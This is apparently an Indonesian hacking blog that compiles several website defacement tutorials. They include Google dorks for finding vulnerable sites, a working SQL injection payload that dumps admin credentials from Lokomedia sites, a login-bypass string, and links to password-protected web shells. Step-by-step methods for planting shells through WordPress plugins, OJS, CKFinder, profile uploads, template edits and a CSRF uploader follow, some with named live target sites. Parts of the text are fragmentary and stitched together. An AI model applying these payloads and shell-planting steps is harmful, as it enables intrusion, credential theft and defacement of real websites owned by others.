biomechanical-analysis.com

Oh iya ane mau share cara deface lg nih , tapi dengan cara yg berbeda :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ……….. ahh sudahlah lupakan :v … Yuk disimak caranya :V

Bahan Bahan :

#Dork : inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]

#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
  password shellnya : akugans

#Exploit :

‘/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)–+

#Admin finder online/admin finder tools jg boleh :v

#oh ea , saran ane sih sambil dengerin musik Marshmello :v

Caranya :

1. seperti biasanya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya tapi cari yg ada halaman statisnya :v, lihat gambar :v

2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar

3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
 http://sewakursimejamurah.com/statis-1’/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)–+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd…..] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v

4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09……. nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA

5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx  ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar

6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, bisa juga pke admin finder tools :v, bisa juga pke cara manual nih ane ajarin , caranya

*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v

7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini

8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v
OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v

9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v

10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
      jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v

11. ok klo shell udh berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu  . jadi kaya gini http://sewakursimejamurah.com/files/shell.phtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v … nah dan jreng jreng ane udh ketemu nih akses shellnya lihat gambar :v

hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalo mau jadi bajingan tapi ragu-ragu mending jangan

h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v

Oh iya klo ada link atau gambar yg ga muncul atau ada yg ga ngerti bisa langsung kontak ane

Setelah sekian lama share berita berita trus, Kini saatnya Share cara deface Wp Add Admin

Kita memanfaatkan pada form loginnya, ok langsung aja ya bahan bahannya dan caranya

Bahan Bahan :

1. Dork : inurl:/wp-login.php?action=register site:in [ Site bisa diganti sesuai keinginan ]

2. Email yang aktif , karna email kita digunain untuk mengaktifkan user &  password yg kita daftarkan

3. File zip yang digunakan untuk upload shell saat nanti udh selesai register, bagi yg blm punya file zipnya kalian bisa download disini ~> Klik Disini!! , Kalo link pertama rusak/gabisa kalian bisa download disini ~> Link Download ke 2
Isi dari file zip tersebut
– shellmini
– shellbesar
– shellxai dll nya

4. wajah yg ganteng >:( , kalo gk gans ya gabisa pekok >:( awokakoaowk canda :v

Caranya guys :*

1. Hal 1 seperti biasa gan klean dorking dlu menggunakan dork diatas ke mesin pencarian Google awokawok :v

2. Kalo udh dorking nah , pilih salah satu website yg tampilannya sperti ini atau yg tampilannya di bawahnya ada form register , ini contohnya

Liat yg dilingkari kan? nah itu dia form registrasinya

3. Slnjutnya kita klik registrasi , dan masukkan email yg aktif beserta username terserah kalian klo usernamenya , contoh kya gini

4. Nah klo udh registrasi , kalian cek email kalian, nnti di email klean ada link aktivasi buat membuat passwordnya

5. Kalo klean udh selesai registrasi , nah login dengan username dan password yg klean buat tadi… Jika berhasil login. kita masuk sebagai admin. contoh lihat gambar

6. Nah kita udh msuk sebagai admin nih, Lalu gimana caranya upload shell? Gimana? Iya kalem w kasih tau caranya
Ok di dashboard admin, kalian cari tulisan [ Plugin ] *Tanpa tnda kurung
Lihat gambar

7. Nah selanjutnya kalian upload file yg format zip tadi , uploadnya di plugin ea :v
Kalo upload nya berhasil maka akan kya gini tampilannya

Pokoknya klo upload brhsil , ada tulisan [ akrivate plugins ]

8. Nah kan file udh ketanem, selanjutnya kita mencari akses shellnya, gimana nyarinya? iya gimana ea?
Ok gini caranya kalian tinggal tambahkan contoh
www.site.com/wp-content/plugins/namafilelu/jenisshellnya
Contoh kya gini liat gambar

9. Nah itu dia contoh nyari akses shellnya… Btw shell w udh ke upload ea :v, wkwkwk nah klo akses shell udh ketemu trus mau diapain tuh? wkwkwk silahkan tebas index… tapi saran sih kalo tebas index backup indexnya gan
Hargain webmaster dari website tersebut gan :v pakai Ethica Hacking lo :v

dah ya tutorialnya cukup smpe disini aja ya…
Ok sekian. see you next time guys :*

Pernah denger kasus web memecomic.id di hack? pernah denger? ya si peretas hanya menitipkan file di web memcomic , klo udh tau beritanya baguss guud :v
Nah sekarang ane mau kasih tau nih cara hack seperti kasus web memecomic.id
Cara ini ane dapet + cara ini bersumber dari forum IndoXploit

Nah sekarang ane kasih tau caranya nih , DEFACE DENGAN SOCKET SERVER WITH PERL

Bahan Bahan :

#Yg hrus kalian punya itu File perl , ane udh sediain nih file perl nya silahkan di download disini
  Download
  Nanti file perl nya lu edit aja sendiri nomor portnya sama tambahin nick lu ok oc :v

#Syarat kedua lu harus punya website yg udh lu tanem shell backdoor , nanti akan di upload trus dijalankan file perl lu :v

#jangan lupa makan sama minum :*

Caranya neh >:(

1. lu buka web yg udh lu tanem shell, tapi liat dlu , perl nya ON apa gk , cara lihatnya bisa dari sini ada shell bagian atas

2. lu buka website yg udh lu tanem shell , Trus ke form upload, nah upload file perl yg tdi lu download , nah ini ane ss file perl yg udh ane upload

3. nah klo udh di upload sekarang jalankan file perlnya di menu [ Command ] udh ada di dlm shell , lu ketik ini di menu command [ perl oh.pl ] TANPA TANDA KURUNG ,, Trus enter lalu tunggu sebentar biasanya agak lama

4. klo udh di ketik itu , sekarang kita cek websitenya , contoh : site.com:1337
    – 1337 = Nmor port yg di file oh.pl

5. Nah itu hasilnya kaya gitu , tinggal tambahin nomor port yg di file oh.pl
Gomana udh ngerti? Klo ada yg kurang ngerti bisa contact ane di fb

Ok sekian …. See You Next Time Guys :*

Oh ea sbenernya oe masih ngantuk neh :v , Semalem oe bobo jam 2 pagi 🙁 , Tapi oe pagi pagi gini mau tebar ilmunya neh :v yaituuuuuuu :v
DEFACE DENGAN CARA CKFINDER
Jreng boom :v , Mungkin sebagian udh tau deface dengan cara ini , tapi apa salahnya kita untuk mencoba lagi trus mencoba trus mencoba dan mencoba :v dan mengasih tau bagi yg blm tau :v
Kebetulan deface dengan cara ini msih banyak web yg vulnerability mungkin ada disekita 20++ web yg vuln cara ini , GOOGLE pun juga bisa di deface pke cara ini :v , awokaokaowkk dasar heker jaman now :v … Langsung aja ya bahan dan cara caranya :v

Bahan Bahan :

# Dork : inurl:/CKfinder/CKfinder.html site:com [ Site bebas mau apa aja bisa .com .org .in go.id .gov pokoknya bebas ]

#Kali ini kita hanya membutuhkan sebuah teks, tulisan [ Pke script deface juga bisa sih tapi jarang , kebanyakan hanya teks doang ] ,, krna deface ini hnya pke teks sama gambar doang mungkin bagi yg blm punya teksnya bisa di download disini teks nya >> https://ufile.io/v0rpj

#Koneksi Internet yang kenceng ea :*

Langsung aja caranya disni :

1. Seperti biasanya kita buka mesin pencarian senior kita yaitu https://google.com Ok kalo udh search di google sekarang pilih salah satu webnya, lihat gambar

2. nah sekarang buka web yg klean pilih , penampakannya akan seperti ini lihat gambar

3. selanjutnya kita upload text yg kalian download diatas tdi, udh ane kasih kan? nah iya sekarang upload textnya , klo udh ke upload akan muncul text kalian yg tadi , seperti ini lihat gambar :v text yg ane upload nmanya anonymous tuh lihat gmbar :v

4. karena itu ane udh coba upload dalam format teks , sekarang ane mau coba upload dalam bentuk gambar, klo kalian mau upload sebuah gambar bisa klik di folder [ Images ] nah trus nanti klik upload, boom ane udh berhasil upload gambarnya yg namanya palestina.jpg itu gambar ane :v ,lihat gambar :v

5. Nah file teks sma file gambar udh ke upload sekarang kita klik kanan pada file/gambar yg udh kalian upload tadi , lalu pilih view dan jreng jreng jreng ini dia hasil gambar yg udh ane upload tadi :v

6. OH IYA bagi kalian yg upload gambar trus susah cara cari gambarnya atau cara buka gambarnya seperti diatas , nih ane kasih patch nya aja tinggal tambahin nama gambar lu di akhir url nih patchnya

http://birodikmental.jakarta.go.id/extra/ckfinder/core/connector/php/media/ckfinder/images/palestina.jpg   [ YANG PALESTINA.jpg Ganti dengan nama gambar yg udh lu upload tadi ] Ngerti kan? Klo ga ngerti chat oe aja :v

7.Oh iya udh pada ngerti kan? pasti dong ya lach kan udh pro >:(
 yaudh oh iya tuh ane kasih live target juga buat bahan percobaan bagi yg pemula hehehe :v
ok ane pamit ea fans :* :*

oh ea klo ada yg ga ngerti langsung chat ane aja di ? Dimana ? Dimana aja :v

ok sekian dolo ea tutor defacenya nanti ane balik lagi , ngasih tutor tutor yg lebih zeeb :v ok sekian

Hoaaam ane ngantuk gan 🙁 ,,, tapi ane keinget ada 1 tutor lagi yg masih banyak yg vulnerability , ya jadi apa salahnya ane tulis disini berbagi ilmu itu indah, jadi jangan merasa pling tinggi trus lupa sma yg dibawah h3h3,,
Jadi gini cuy w mau kasih tau neh tutor deface dengan cara REGISTER MEMBER nah napa kaget y asu? >:( sp yg kaget sene? w sleding satu satu h3h3 :v
Nah kebetulan deface pke dengan teknik ini hampir sama dengan teknik deface Ojs sama sama register cuman bedanya gk susah cari akses shellnya. udah ah langsung ae ye? ok gass ngeng ngeng :V

Bahan Bahan :
#Dork : inurl:media.php?module=daftar
             inurl:/register.html intext:”Share this article”
            [ Kembangin lagi dorknya ]

#Shell backdoor/ Script deface 
   Shell format .php5 download disini > https://uploadfiles.io/ervxh password shell : akugans
   Shell format .phtml download disni > https://uploadfiles.io/72upn password shell : akugans

#Inget wajah yang ganteng , sama apalagi ea?? Oh iya inget hrus ada koneksi internet , jangan bilang selama ini klean ngerjain ini gk pke koneksi internet >:( , udah ah oe ngantuk langsung aja ya caranya

Langsuk disimak caranya dibawah ini , cekidot :*

1. Hal 1 yg harus klean lakukan adalah buka gugel/gogel/google/ggoollee/apalah pokoknya :v, ya buka gugel trus search menggunakan dork diatas, nah pilih salah satu website nya bukan salah satu video b*kepnya 🙁

2. jika klean udh memilih salah satu website, selanjutnya klean Register Sebagai Member dlu di website yg klean pilih, Nih ane aja register masa kamuu ngga? 🙁

3. Kalo udh selesai register , kadang tempat buat upload shell ada di dalem kadang di luar , klo sperti gmbr yg di atas itu tmpt upload shellnya ada diluar , ok selesai register silahkan login , nih ane aja mau login masa kamu yg cantik gk login :*

4. Nah klo udh berhasil masuk sebagai member saatnya klean berjoged dolo goyang goyang asique jungkirbalik kalo perlu :v, dah ah asu jadi alay gini >:(….. Ok next jika klean udh masuk sebagai member sekarang saatnya cari tempat [EDIT PROFIL] mungkin beda web beda nmanya juga kli ya :v, yah pokoknya tmpt buat edit data data lu sma edit foto profil lu sebagai member kayak gini

5. Oh iya , Karena tadi ane tempat buat upload shell/upload script ada di form register jadi di dalam gk ada tmpt upload shell karena kan tdi udh diluar, mungkin beda website beda juga jenisnya :v
Oh iya inget upload shellnya harus ber extensi shell.phtml sama shell.php5 klo yg blm ada shell bisa di download dii atas udh ane sediain :v

6. Nah kalo klean sudah upload shell kalian di tempat foto profil kalean langsung aja klik kanan terus pilih [Open Image In New Tab] klo berhasil pasti bakal muncul shellnya, klo gk berhasil ya gk muncul shellnya, eh iya gan kebetulan ane berhasil neh upload shellnya dan jreng jreng door door

7. Nah klo udh berhasil upload shell klean mao apa? krik krik krik awokaowkaokwakw :v
Oh ea klo mau tebas indexnya gw saranin backup indexnya coy kasihan adminwebnya nanti :v. ok guuuud :v
Jadi gini gan saia udh ngantuk ini 🙁 , sekarang malming ea gan ? walaaach 🙁
udah ea saia pamit sekian dolo tutorial dari ane kali ini , klo ada yg kurang ngerti bisa langsung contact oe ok ea ane pamit
Wassalamualaikum Wr Wb :* 🙂

Jadi gini, aku mau share tutor Deface OJS ne cooy :vOk langsung aja ya cara and bahan bahannya :v

Bahan Bahan :
# Dork : inurl:index.php/index/user/register site:ac.id
# Ojs Shell Finder / Klo Mau pke cara manual juga bisa :v
# Shell backdoor / script deface
# wajah yg gans
# aer putih + sianida + baygon + soffel h3h3 :v

langsung aja ya disimak caranya di bawah ini cekidot :v

1. cari target menggunakan dork diatas, pilih salah satu web yg ingin di di deface :v

2. jika sudah memilih webnya, sebelomnya kita cek dlu vuln atau kaga itu webnya :v , caranya? ok caranya kita cukup tambahkan /files di akhir url web target :v. misalkan :
www.site.com/files [ kalo muncul index of atau forbidden kita masih ada kesempatan ] klo notfound yah mungkin kurang ganteng :v wkwkwk :v ok next >:(

3. sesudah kita cek vuln ape kga itu website nah sekarang kita coba register seperti gambar berikut

 

Pas dimenu register , jangan centang yg tulisan Send a verification email with username and password.
Tapi ceklis tulisan yang Author : Prepared texts can be submitted
liat gambar klo kurang ngerti

4. nah klo udh regitser silahkan login dengan username sma password yg baru di daftar tadi gan :v, nah zeeb

5. nah ini oe udh login , sekarang klik [ New Submission ] , Centang semua trus klik save and continue , lihat gambar klo kurang ngerti :v

6. abis klik save and continue, trus upload shell mu gan :v, di kolom bawah ada tempat buat upload shell tuh :v, INGAT! extensi shell harus format .phtml  contoh : shell.phtml nah jadi ubah dlu ya format shellnya hehe :v, nah klo udah berhasil upload shell nanti akan muncul bisa dibilang nomor kebruntungan bisa dibilang nomor shell lu :v , harus di ingetin tuh nomor shell lu biar gk lupa mending di ss aja nomor shellnya, itu gunanya buat cari dimana shell lu berada gan :v , lihat gambar

7. nah itu nomor shell ane, klo nomor shell lu yaa beda laah coeg ga sama wkwkw :v ,, selanjutnya kita cari akses shellnya dengan menggunakan Ojs Shell Finder Dari N45HT neh gan sekalian promosi team ane wkwk nih linknya http://blog.n45ht.web.id/2017/06/ojs-shell-finder.html tuh cara cari akses shellnya , eh iya jangan lupa Like fanspage kami ya di facebook cari aja N45HT hehe ok lanjut ahh wkwkwk

8. nah kan udh tau caranya tuh cari cara akses shellnya pke xampp ketik di cmd
cd c:/xampp/php
c:/xampp/php>php ojs.php url target nama shell lu bla bla bla selebih tutornya ada di atas udh oe kasih hehe

9. nah jreng jreng oe udh berhasil nemuin akses shellnya nih, terserah deh mau diapain tuh web mau di tebas semua index.php juga silahkan tapi INGAT!!! [ Klo mau tebas indexnya hrus di backup dolo , kasihan webadmin nya nnti , apalagi itu web indonesia web kuliah domainnya aja ac.id jadi jgn lupa di backup yaa kids kids jaman now :v ] , lihat gambar akses shell oe dh ketemu

Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

Lalu akan muncul ini

Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

Kalau berhasil akan muncul seprti ini

The command executed successfully

Sekarang kita lihat shell kita

akses shellnya? site.com/shell.php

Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya 🙂

Kali ini admin ganteng mau share cara deface nih, yap Deface Dengan Cara Timthumb

Damn, berhasil !!!

Oke tinggal kalian deface deh webnya

Oke sekian dulu tutorialnya

Terima kasih sudah berkunjung…..

3. OK upload shell kalian yg ext : .php .phtml .php5 Dll , pokoknya sepinter pinternya lo bypass shell

    Gw disini upload shell ext : php

4. Ok skrg kita akses shellnya

Damn , ternyata berhasil

NB : Kalo untuk akses shell defaultnya , sprti ini

         site.com/component/upload/file/uploads

Oh iya deface ini gk ribet kok, tinggal upload shell kalian, langsung aja ya caranya

DORK

1. lo dorking ke google atau bing atau search engine lainnya, lalu cari web yg ada filemanager nya

contoh seperti ini

2. Nah kita disuruh masukin username sama password :(, sans jgn sedih dulu, kita coba aja masukin username & password nya ini

Kita lihat hasilnya

You are logged in , tau kan artinya apa? yap kita udh berhasil login pakai username dan password yg gw kasih >_<

Nah kalau sudah login, bebas mau lo apain, upload shell juga bisa, jungkir balik juga bisa

tampilan sesudah login

Note : USERNAME SAMA PASSWORD YANG TADI GW KASIH, GK SEMUA BISA DI FILE MANAGER LAINNYA, JADI BYPASS SENDIRI AJA YA XD

Ok sekian gan Tutorialnya

See you next time guys :*

4. Yap sekarang ke menu templates, look at picture

5. Cari template yg tadi aktif, gw udh nemu nih template yg tadi aktif

6. Klik template yg aktif tadi, damn kita kita udh diberi akses buat ngedit file filenya, nah disini kita mainkan, Mending upload uploader dlu, baru nnti upload shell

Gw mau coba edit file logic.php

gw masukin script uploader nya, lalu klik save

7. Yap sudah ke save, sekarang kita akses uploader / shell nya

Caranya? easy

site.com/templates/namatemplateyangaktiftadi/nama file yang tadi lo edit.php

Contoh >> http://oasiscollezione.com/templates/horme_3/logic.php

Ok sekian tutorialnya gan

See you next time 😀

oh iya ane mao tanya ne , klean semua ga pada malming ?? >:( , asulo joneszzsz awoakoakwkawko :V canda y asu :v .. dah ah langsung ja ya bahan bahan dan caranya disimak jgn nntn b*kep trs 

Bahan Bahan :

#Dork : inurl:admin/login.php site:in [Site bisa diubah sesuai keinginan]

#Inject bypass admin : ‘ or 1=1 limit 1 — -+

#Shell Backdoor klo yg gapunya silahkan download disni ane kan baek wkwk :v, nih 

  shell format .php5 download > https://ufile.io/ervxh password shell : akugans

  shell format .phtml download > https://uploadfiles.io/72upn password shell : akugans

#kan ini malam minggu jadi siapin lilin,mangkok terus ngepet deh awkokawokak :v canda >:(

#Oh y deface ini dibutuhkan wajah yang ganteng , klo ga ganteng yah gabisa 🙁

Ok langsung aja ya caranya disimak dimohon tidak nntn b*kep dolo >:(

1. sekarang kita search ke google menggunakan dork yg diatas ane kasih gan, klo udh ketemu pilih          salah satu website , nah klo udh pilih salah satu website sekarang kita coba masukkan username dan password dengan kode inject diatas tuh udh ane kasih >:( , lihat gambar 

2. Nah sekarang kita login, klo berhasil ya masuk ke dalam dashboard adminnya, klo gk bisa mungkin kurang ganteng >:( , lihat gambar contoh ane udh masuk ke halaman dashboard admin

3. Nah kita udh masuk ke halaman adminnya neh , kita bebas neh mau jungkirbalik mau muter muter mau ngapain aja boleh , oh iya udh tau blm tmpt nya dimna buat upload shell??, mungkin klo yg udh tau diem aja ya, ini ane ksih tau yg blm tau :v

Tempat buat upload shell itu bisa di tempat : dokumen,gambar,banner dll nya [Pokoknya yg ada tempat upload nah disitu shellmu di upload] , 

4. Nah jreng jreng ane udh ketemu form upload neh >:( , ane kali ini upload shell lewat gambar , lihat gambar 

5. Nah itu tempat buat upload shellnya >:( , nah isi semua asal asalan aja trus pilih file shellmu 

[ OH IYA PERHATIKAN : kan klo shell format biasanya .php ya kan? , nah knpa sekarang gk upload .php ? knpa? ok ane jelasin ,,,, Jadi kita mem bypass ext shellnya agar bisa di upload , bypass ext shell bisa shell.php5 , shell.php6 , shell.php.xxxjpg …. knpa kita bypass ext shellnya knpaa?? ya karena klo kita upload shell format .php gk support gan , ya dengan cara ini kita bypass ext shellnya, dan knpa kita upload ext .php5 tetap bisa kebuka shellnya knpaa? ok ane jelasin krna server gk bisa baca dri format yg gk biasanya itu, jadi server hanya membaca format default yaitu .php … gimna dh ngerti kan? klo blm ngerti kurang ganteng lu >:( ok next

6. ok shell udh ke upload selanjutnya kita kembali, dan lihat gambar apa aja yg tidak muncul gambarnya? jika ada salah satu gambar yg gk muncul/rusak/putih kita klik [ Open Image In New Tab ] pada gambar yg rusak tersebut gan  >:( , nih contoh gambar yg blank/rusak/gk muncul nomor 2 dari atas lihat gambar

7. nah kita klik open image in new tab gan , dan akhirnya jreng tet to tet to tet , shell udh tertanam, lihat gambar 

8. nahhh shell udh berhasil tertanem, sekarang terserah deh mau diapain tuh shell , mungkin di diemin aja juga boleh, di liatin doang juga boleh awkoakwokawkwok :v, oh iya oe boleh nitip nick ga neh? sedih jadi oe nasib noob 🙁 

Nick Saia : crshs

Oh iya klo msih yg punya iman terserah mau tebas index tanpa backup jg gpp di backup juga alhamdulillah ,, ok jadi gw mau ngapain lg neh ? krik krik krik krik……….

Ok dah oe pamit yaaa wahai para fansssszzz :*

Wassalamualaikum Wr Wb 🙂

3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php

4. Upload extensi shell .jpg  , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action=”site.com” dengan web yg vuln

5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini

6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu

look >> https://www.madisonts.com/js/tinymce/plugins/image/uploads/bacot.php nah ini shell gw

mudah bukan? eheheh

ada yang masih kurang ngerti? Jangan ragu untuk bertanya

Ok sekian..

terima kasih sudah berkunjung